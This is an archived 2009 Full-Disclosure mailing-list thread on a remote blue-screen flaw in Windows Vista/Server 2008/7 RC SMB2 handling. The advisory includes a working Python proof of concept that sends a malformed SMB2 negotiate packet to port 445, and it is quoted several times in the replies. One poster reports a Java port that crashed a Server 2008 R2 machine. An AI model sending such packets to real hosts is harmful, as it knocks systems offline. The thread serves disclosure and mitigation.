Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-10-04 Thread laurent gaffie
More explication on cve-2009-3103

http://g-laurent.blogspot.com/2009/10/more-explication-on-cve-2009-3103.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-14 Thread Randal T. Rioux
Scratch that - the version of 2008 I had wasn't an official R2 release. So
original reports still hold. It didn't crash my R2 build 7600.

Laurent, et al, has this been tried against an Itanium machine? Just
curious. Nobody at work will let me test the exploit against their Itanium
servers.

Randy

On Mon, September 14, 2009 12:02 am, Randal T. Rioux wrote:
> After testing my version of the exploit (using Java instead of Python) I
> tried it against a Windows Server 2008 R2 installation - it went down.
>
> http://www.procyonlabs.com/software/smb2_bsoder
>
> Randy
>
>
> laurent gaffie wrote:
>> Advisory updated :
>>
>>
>> =
>> - Release date: September 7th, 2009
>> - Discovered by: Laurent Gaffié
>> - Severity: High
>> =
>>
>> I. VULNERABILITY
>> -
>> Windows Vista, Server 2008 < R2, 7 RC :
>> SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
>>
>> II. BACKGROUND
>> -
>> Windows vista and newer Windows comes with a new SMB version named SMB2.
>> See:
>> http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
>> for more details.
>>
>> III. DESCRIPTION
>> -
>> [Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS
>> patch, for another SMB2.0 security issue:
>> KB942624 (MS07-063)
>> Installing only this specific update on Vista SP0 create the following
>> issue:
>>
>> SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
>> PROTOCOL REQUEST functionnality.
>> The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a
>> SMB server, and it's used to identify the SMB dialect that will be used
>> for futher communication.
>>
>> IV. PROOF OF CONCEPT
>> -
>>
>> Smb-Bsod.py:
>>
>> #!/usr/bin/python
>> #When SMB2.0 recieve a "&" char in the "Process Id High" SMB header
>> field
>> #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
>>
>> from socket import socket
>>
>> host = "IP_ADDR", 445
>> buff = (
>> "\x00\x00\x00\x90" # Begin SMB header: Session message
>> "\xff\x53\x4d\x42" # Server Component: SMB
>> "\x72\x00\x00\x00" # Negociate Protocol
>> "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
>> "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
>> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
>> "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
>> "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
>> "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
>> "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
>> "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
>> "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
>> "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
>> "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
>> "\x30\x30\x32\x00"
>> )
>> s = socket()
>> s.connect(host)
>> s.send(buff)
>> s.close()
>>
>> V. BUSINESS IMPACT
>> -
>> An attacker can remotly crash any Vista/Windows 7 machine with SMB
>> enable.
>> Windows Xp, 2k, are NOT affected as they dont have this driver.
>>
>> VI. SYSTEMS AFFECTED
>> -
>> [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008
>> < R2, Windows 7 RC.
>>
>> VII. SOLUTION
>> -
>> No patch available for the moment.
>> Close SMB feature and ports, until a patch is provided.
>> Configure your firewall properly
>> You can also follow the MS Workaround:
>> http://www.microsoft.com/technet/security/advisory/975497.mspx
>>
>> VIII. REFERENCES
>> -
>> http://www.microsoft.com/technet/security/advisory/975497.mspx
>> http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx
>>
>> IX. CREDITS
>> -
>> This vulnerability has been discovered by Laurent Gaffié
>> Laurent.gaffie{remove-this}(at)gmail.com 
>>
>> X. REVISION HISTORY
>> -
>> September 7th, 2009: Initial release
>> September 11th, 2009: Revision 1.0 release
>>
>> XI. LEGAL NOTICES
>> -
>> The information contained within this advisory is supplied "as-is"
>> with no warranties or guarantees of fitness of use or otherwise.
>> I accept no responsibility for any damage caused by the use or
>> misuse of this information.
>>
>> XII.Personal Notes
>> -
>> Many persons have suggested to update this advisory for RCE and not
>> BSOD:
>> It wont be done, if they find a way to execute code, they will publish
>> them advisory.
>
>


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-14 Thread r1d1nd1rty
Oh WOW! More exploit code ported to Java!!

Hello Randy,
Not everyone would have gone to all the trouble you did for me 
and I want you to know how much I appreciate it. It seems that you 
are always going above and beyond the call of duty. No wonder so 
many people are happy and proud to call you an elite h4x0r. It was 
really wonderful of you to direct port Laurent's SMB2.0 BSOD python 
exploit code in to Java and call it your own, and I'll never be 
able to thank you enough. 

However, in doing so, an apology to Laurent AND the FD list for the 
dissemination of your Java port and post to FD mailing list is 
therefore required. There is simply no need for Java in any 
circumstances, and it is truly a shame to see such a wonderful 
exploit treated in such a horrendous way. Perhaps if you added, 
removed or improved the exploit, an apology would not have been 
required... but you didn't.

Thanks for you time,
  /rd

for dem geeks rdy to bounce 'em

Ya my number two on some old school DJ Screw
You can't arrest me, plus you can't sue
This is a message to the laws, tell 'em "We hate you"
I could be tough tell 'em that they shoulda known
Tippin down, sittin crooked on my chrome
Bookin my phone, findin a chick I wanna bone
Like they couldn't stop me
I'm bout to pull up at your home, and it's on

...

It's fun :-) 
 On Mon, September 14, 2009 12:14 pm, D-vice wrote: 
 > You wrote an exploit in java
 >
 >
 > *head explodes*
 >
 > On Mon, Sep 14, 2009 at 6:02 AM, Randal T. Rioux
 > wrote:
 >
 >> After testing my version of the exploit (using Java instead of 
Python) I
 >> tried it against a Windows Server 2008 R2 installation - it 
went down.
 >>
 >> http://www.procyonlabs.com/software/smb2_bsoder
 >>
 >> Randy
 >>
 >>
 >> laurent gaffie wrote:
 >> > Advisory updated :
 >> 
 >> >
 >> > =
 >> > - Release date: September 7th, 2009
 >> > - Discovered by: Laurent Gaffi�
 >> > - Severity: High
 >> > =
 >> >
 >> > I. VULNERABILITY
  >> > -
 >> > Windows Vista, Server 2008 < R2, 7 RC :
 >> > SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
 >> >
 >> > II. BACKGROUND
  >> > -
 >> > Windows vista and newer Windows comes with a new SMB version 
named
 >> SMB2.
  >> > See:
 >> >
 >> 
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#S
erver_Message_Block_2.0
 >> > for more details.
 >> >
 >> > III. DESCRIPTION
  >> > -
 >> > [Edit]Unfortunatly this SMB2 security issue is specificaly 
due to a MS
 >> > patch, for another SMB2.0 security issue:
 >> > KB942624 (MS07-063)
 >> > Installing only this specific update on Vista SP0 create the 
following
 >> > issue:
 >> >
 >> > SRV2.SYS fails to handle malformed SMB headers for the 
NEGOTIATE
 >> > PROTOCOL REQUEST functionnality.
 >> > The NEGOTIATE PROTOCOL REQUEST is the first SMB query a 
client send to
 >> a
 >> > SMB server, and it's used to identify the SMB dialect that 
will be
 >> used
 >> > for futher communication.
 >> >
 >> > IV. PROOF OF CONCEPT
  >> > -
 >> >
 >> > Smb-Bsod.py:
 >> >
 >> > #!/usr/bin/python
 >> > #When SMB2.0 recieve a "&" char in the "Process Id High" SMB 
header
 >> field
 >> > #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
 >> >
 >> > from socket import socket
 >> >
 >> > host = "IP_ADDR", 445
 >> > buff = (
 >> > "\x00\x00\x00\x90" # Begin SMB header: Session message
 >> > "\xff\x53\x4d\x42" # Server Component: SMB
 >> > "\x72\x00\x00\x00" # Negociate Protocol
 >> > "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
 >> > "\x00\x26"# Process ID High: --> :) normal value should be 
"\x00\x00"
 >> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
 >> > "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
 >> > "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
 >> > "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
 >> > "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
 >> > "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
 >> > "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
 >> > "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
 >> > "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
 >> > "\x30\x30\x32\x00"
 >> > )
 >> > s = socket()
 >> > s.connect(host)
 >> > s.send(buff)
 >> > s.close()
 >> >
 >> > V. BUSINESS IMPACT
  >> > -
 >> > An attacker can remotly crash any Vista/Windows 7 machine 
with SMB
 >> enable.
 >> > Windows Xp, 2k, are NOT affected as they dont have this 
driver.
 >> >
 >> > VI. SYSTEMS AFFECTED
  >> > -
 >> > [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win 
Server
 >> 2008
 >> > < R2, Windows 7 RC.
 >> >
 >> > VII. SOLUTION
  >> > -
 >> > No patch available for the moment.
 >> > Close SMB feature and ports, until a patch is provided.
 >> > Configure your f

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-14 Thread D-vice
You wrote an exploit in java


*head explodes*

On Mon, Sep 14, 2009 at 6:02 AM, Randal T. Rioux wrote:

> After testing my version of the exploit (using Java instead of Python) I
> tried it against a Windows Server 2008 R2 installation - it went down.
>
> http://www.procyonlabs.com/software/smb2_bsoder
>
> Randy
>
>
> laurent gaffie wrote:
> > Advisory updated :
> >
> >
> > =
> > - Release date: September 7th, 2009
> > - Discovered by: Laurent Gaffié
> > - Severity: High
> > =
> >
> > I. VULNERABILITY
> > -
> > Windows Vista, Server 2008 < R2, 7 RC :
> > SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
> >
> > II. BACKGROUND
> > -
> > Windows vista and newer Windows comes with a new SMB version named SMB2.
> > See:
> >
> http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
> > for more details.
> >
> > III. DESCRIPTION
> > -
> > [Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS
> > patch, for another SMB2.0 security issue:
> > KB942624 (MS07-063)
> > Installing only this specific update on Vista SP0 create the following
> > issue:
> >
> > SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
> > PROTOCOL REQUEST functionnality.
> > The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a
> > SMB server, and it's used to identify the SMB dialect that will be used
> > for futher communication.
> >
> > IV. PROOF OF CONCEPT
> > -
> >
> > Smb-Bsod.py:
> >
> > #!/usr/bin/python
> > #When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
> > #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
> >
> > from socket import socket
> >
> > host = "IP_ADDR", 445
> > buff = (
> > "\x00\x00\x00\x90" # Begin SMB header: Session message
> > "\xff\x53\x4d\x42" # Server Component: SMB
> > "\x72\x00\x00\x00" # Negociate Protocol
> > "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
> > "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
> > "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
> > "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
> > "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
> > "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
> > "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
> > "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
> > "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
> > "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
> > "\x30\x30\x32\x00"
> > )
> > s = socket()
> > s.connect(host)
> > s.send(buff)
> > s.close()
> >
> > V. BUSINESS IMPACT
> > -
> > An attacker can remotly crash any Vista/Windows 7 machine with SMB
> enable.
> > Windows Xp, 2k, are NOT affected as they dont have this driver.
> >
> > VI. SYSTEMS AFFECTED
> > -
> > [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008
> > < R2, Windows 7 RC.
> >
> > VII. SOLUTION
> > -
> > No patch available for the moment.
> > Close SMB feature and ports, until a patch is provided.
> > Configure your firewall properly
> > You can also follow the MS Workaround:
> > http://www.microsoft.com/technet/security/advisory/975497.mspx
> >
> > VIII. REFERENCES
> > -
> > http://www.microsoft.com/technet/security/advisory/975497.mspx
> >
> http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx
> >
> > IX. CREDITS
> > -
> > This vulnerability has been discovered by Laurent Gaffié
> > Laurent.gaffie{remove-this}(at)gmail.com 
> >
> > X. REVISION HISTORY
> > -
> > September 7th, 2009: Initial release
> > September 11th, 2009: Revision 1.0 release
> >
> > XI. LEGAL NOTICES
> > -
> > The information contained within this advisory is supplied "as-is"
> > with no warranties or guarantees of fitness of use or otherwise.
> > I accept no responsibility for any damage caused by the use or
> > misuse of this information.
> >
> > XII.Personal Notes
> > -
> > Many persons have suggested to update this advisory for RCE and not BSOD:
> > It wont be done, if they find a way to execute code, they will publish
> > them advisory.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-14 Thread Randal T. Rioux
It's fun :-)


On Mon, September 14, 2009 12:14 pm, D-vice wrote:
> You wrote an exploit in java
>
>
> *head explodes*
>
> On Mon, Sep 14, 2009 at 6:02 AM, Randal T. Rioux
> wrote:
>
>> After testing my version of the exploit (using Java instead of Python) I
>> tried it against a Windows Server 2008 R2 installation - it went down.
>>
>> http://www.procyonlabs.com/software/smb2_bsoder
>>
>> Randy
>>
>>
>> laurent gaffie wrote:
>> > Advisory updated :
>> >
>> >
>> > =
>> > - Release date: September 7th, 2009
>> > - Discovered by: Laurent Gaffié
>> > - Severity: High
>> > =
>> >
>> > I. VULNERABILITY
>> > -
>> > Windows Vista, Server 2008 < R2, 7 RC :
>> > SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
>> >
>> > II. BACKGROUND
>> > -
>> > Windows vista and newer Windows comes with a new SMB version named
>> SMB2.
>> > See:
>> >
>> http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
>> > for more details.
>> >
>> > III. DESCRIPTION
>> > -
>> > [Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS
>> > patch, for another SMB2.0 security issue:
>> > KB942624 (MS07-063)
>> > Installing only this specific update on Vista SP0 create the following
>> > issue:
>> >
>> > SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
>> > PROTOCOL REQUEST functionnality.
>> > The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to
>> a
>> > SMB server, and it's used to identify the SMB dialect that will be
>> used
>> > for futher communication.
>> >
>> > IV. PROOF OF CONCEPT
>> > -
>> >
>> > Smb-Bsod.py:
>> >
>> > #!/usr/bin/python
>> > #When SMB2.0 recieve a "&" char in the "Process Id High" SMB header
>> field
>> > #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
>> >
>> > from socket import socket
>> >
>> > host = "IP_ADDR", 445
>> > buff = (
>> > "\x00\x00\x00\x90" # Begin SMB header: Session message
>> > "\xff\x53\x4d\x42" # Server Component: SMB
>> > "\x72\x00\x00\x00" # Negociate Protocol
>> > "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
>> > "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
>> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
>> > "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
>> > "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
>> > "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
>> > "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
>> > "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
>> > "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
>> > "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
>> > "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
>> > "\x30\x30\x32\x00"
>> > )
>> > s = socket()
>> > s.connect(host)
>> > s.send(buff)
>> > s.close()
>> >
>> > V. BUSINESS IMPACT
>> > -
>> > An attacker can remotly crash any Vista/Windows 7 machine with SMB
>> enable.
>> > Windows Xp, 2k, are NOT affected as they dont have this driver.
>> >
>> > VI. SYSTEMS AFFECTED
>> > -
>> > [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server
>> 2008
>> > < R2, Windows 7 RC.
>> >
>> > VII. SOLUTION
>> > -
>> > No patch available for the moment.
>> > Close SMB feature and ports, until a patch is provided.
>> > Configure your firewall properly
>> > You can also follow the MS Workaround:
>> > http://www.microsoft.com/technet/security/advisory/975497.mspx
>> >
>> > VIII. REFERENCES
>> > -
>> > http://www.microsoft.com/technet/security/advisory/975497.mspx
>> >
>> http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx
>> >
>> > IX. CREDITS
>> > -
>> > This vulnerability has been discovered by Laurent Gaffié
>> > Laurent.gaffie{remove-this}(at)gmail.com 
>> >
>> > X. REVISION HISTORY
>> > -
>> > September 7th, 2009: Initial release
>> > September 11th, 2009: Revision 1.0 release
>> >
>> > XI. LEGAL NOTICES
>> > -
>> > The information contained within this advisory is supplied "as-is"
>> > with no warranties or guarantees of fitness of use or otherwise.
>> > I accept no responsibility for any damage caused by the use or
>> > misuse of this information.
>> >
>> > XII.Personal Notes
>> > -
>> > Many persons have suggested to update this advisory for RCE and not
>> BSOD:
>> > It wont be done, if they find a way to execute code, they will publish
>> > them advisory.
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-13 Thread Randal T. Rioux
After testing my version of the exploit (using Java instead of Python) I 
tried it against a Windows Server 2008 R2 installation - it went down.

http://www.procyonlabs.com/software/smb2_bsoder

Randy


laurent gaffie wrote:
> Advisory updated :
> 
> 
> =
> - Release date: September 7th, 2009
> - Discovered by: Laurent Gaffié
> - Severity: High
> =
> 
> I. VULNERABILITY
> -
> Windows Vista, Server 2008 < R2, 7 RC :
> SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
> 
> II. BACKGROUND
> -
> Windows vista and newer Windows comes with a new SMB version named SMB2.
> See: 
> http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
> for more details.
> 
> III. DESCRIPTION
> -
> [Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS 
> patch, for another SMB2.0 security issue:
> KB942624 (MS07-063)
> Installing only this specific update on Vista SP0 create the following 
> issue:
> 
> SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE 
> PROTOCOL REQUEST functionnality.
> The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a 
> SMB server, and it's used to identify the SMB dialect that will be used 
> for futher communication.
> 
> IV. PROOF OF CONCEPT
> -
> 
> Smb-Bsod.py:
> 
> #!/usr/bin/python
> #When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
> #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
> 
> from socket import socket
> 
> host = "IP_ADDR", 445
> buff = (
> "\x00\x00\x00\x90" # Begin SMB header: Session message
> "\xff\x53\x4d\x42" # Server Component: SMB
> "\x72\x00\x00\x00" # Negociate Protocol
> "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
> "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
> "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
> "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
> "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
> "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
> "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
> "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
> "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
> "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
> "\x30\x30\x32\x00"
> )
> s = socket()
> s.connect(host)
> s.send(buff)
> s.close()
> 
> V. BUSINESS IMPACT
> -
> An attacker can remotly crash any Vista/Windows 7 machine with SMB enable.
> Windows Xp, 2k, are NOT affected as they dont have this driver.
> 
> VI. SYSTEMS AFFECTED
> -
> [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 
> < R2, Windows 7 RC.
> 
> VII. SOLUTION
> -
> No patch available for the moment.
> Close SMB feature and ports, until a patch is provided.
> Configure your firewall properly
> You can also follow the MS Workaround:
> http://www.microsoft.com/technet/security/advisory/975497.mspx
> 
> VIII. REFERENCES
> -
> http://www.microsoft.com/technet/security/advisory/975497.mspx
> http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx
> 
> IX. CREDITS
> -
> This vulnerability has been discovered by Laurent Gaffié
> Laurent.gaffie{remove-this}(at)gmail.com 
> 
> X. REVISION HISTORY
> -
> September 7th, 2009: Initial release
> September 11th, 2009: Revision 1.0 release
> 
> XI. LEGAL NOTICES
> -
> The information contained within this advisory is supplied "as-is"
> with no warranties or guarantees of fitness of use or otherwise.
> I accept no responsibility for any damage caused by the use or
> misuse of this information.
> 
> XII.Personal Notes
> -
> Many persons have suggested to update this advisory for RCE and not BSOD:
> It wont be done, if they find a way to execute code, they will publish 
> them advisory.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-11 Thread laurent gaffie
Advisory updated :


=
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: High
=

I. VULNERABILITY
-
Windows Vista, Server 2008 < R2, 7 RC :
SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
-
Windows vista and newer Windows comes with a new SMB version named SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

III. DESCRIPTION
-
[Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS
patch, for another SMB2.0 security issue:
KB942624 (MS07-063)
Installing only this specific update on Vista SP0 create the following
issue:

SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL
REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB
server, and it's used to identify the SMB dialect that will be used for
futher communication.

IV. PROOF OF CONCEPT
-

Smb-Bsod.py:

#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
-
An attacker can remotly crash any Vista/Windows 7 machine with SMB enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.

VI. SYSTEMS AFFECTED
-
[Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 <
R2, Windows 7 RC.

VII. SOLUTION
-
No patch available for the moment.
Close SMB feature and ports, until a patch is provided.
Configure your firewall properly
You can also follow the MS Workaround:
http://www.microsoft.com/technet/security/advisory/975497.mspx

VIII. REFERENCES
-
http://www.microsoft.com/technet/security/advisory/975497.mspx
http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx

IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-
September 7th, 2009: Initial release
September 11th, 2009: Revision 1.0 release

XI. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII.Personal Notes
-
Many persons have suggested to update this advisory for RCE and not BSOD:
It wont be done, if they find a way to execute code, they will publish them
advisory.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-10 Thread Mitch Oliver
 > I. VULNERABILITY
 > - -
 > Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

This does not appear to apply to the version of Windows 7 released to 
manufacture.  It does, however, 
apply to all beta versions and Windows 2008.

Mitch Oliver

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-10 Thread D-vice
n3td3v works for micro$ucks, go figure

On Thu, Sep 10, 2009 at 6:56 AM, James Matthews  wrote:

> So Msoft! why can't they just stop reintroducing bugs?
>
>
> On Wed, Sep 9, 2009 at 11:04 AM,  wrote:
>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> How come all I hear about is n3td3v, and I see noone crying out
>> lout about this :
>> http://www.reversemode.com/index.php?option=com_mamblog&Itemid=15&ta
>> sk=show&action=view&id=64&Itemid=15
>>
>> is fd all 'bout trolls nao?
>>
>> - --
>> =
>> - - Release date: September 7th, 2009
>> - - Discovered by: Laurent Gaffié
>> - - Severity: Medium/High
>> =
>>
>> I. VULNERABILITY
>> - -
>> Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
>>
